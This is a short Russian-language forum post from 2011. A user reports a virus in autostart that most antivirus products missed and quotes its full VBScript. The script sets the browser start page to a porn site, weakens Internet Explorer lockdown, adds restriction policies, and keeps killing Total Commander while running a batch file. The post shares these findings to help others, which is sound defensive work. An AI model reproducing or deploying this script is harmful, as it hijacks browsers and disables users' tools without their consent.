Leksandr
Junior Member | Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Rush как оказалось, ты прав! только тут вирус и что интересно его кроме авиры ни один антивир не определил. в автозагрузке был вот этот скриптик smit.dll.vbs Код: on error resume next Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") s.regwrite"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http:\\www.porno.хх" s.regwrite"HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD" s.regwrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFindFiles","1","REG_DWORD" s.regwrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoNavButtons","1","REG_DWORD" do wscript.sleep 7000 s.run"taskkill /f /im totalcmd.exe",0 s.run"C:\Windows\System\XIL.bat",0 loop | Потом и по батнику тельца нашел... | Всего записей: 103 | Зарегистр. 07-12-2004 | Отправлено: 11:09 04-08-2011 | Исправлено: Leksandr, 11:09 04-08-2011 |
|